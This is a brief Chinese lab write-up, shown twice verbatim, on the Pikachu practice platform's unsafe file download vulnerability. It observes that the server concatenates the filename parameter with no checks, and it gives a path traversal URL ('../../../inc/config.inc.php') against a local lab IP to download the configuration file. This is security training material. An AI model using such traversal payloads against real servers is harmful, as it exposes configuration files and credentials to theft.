文件下载
右键在新的标签页中打开文件:
观察后台代码呢发下他没有做任何的防护,直接将get到的字符串拼接完成下载 我们可以构造一个url下载文件:
http://192.168.0.105/pikachu/vul/unsafedownload/execdownload.php?filename=../../../inc/config.inc.php
这样就把可以把敏感文件下载在本地:
文件下载
右键在新的标签页中打开文件:
观察后台代码呢发下他没有做任何的防护,直接将get到的字符串拼接完成下载 我们可以构造一个url下载文件:
http://192.168.0.105/pikachu/vul/unsafedownload/execdownload.php?filename=../../../inc/config.inc.php
这样就把可以把敏感文件下载在本地: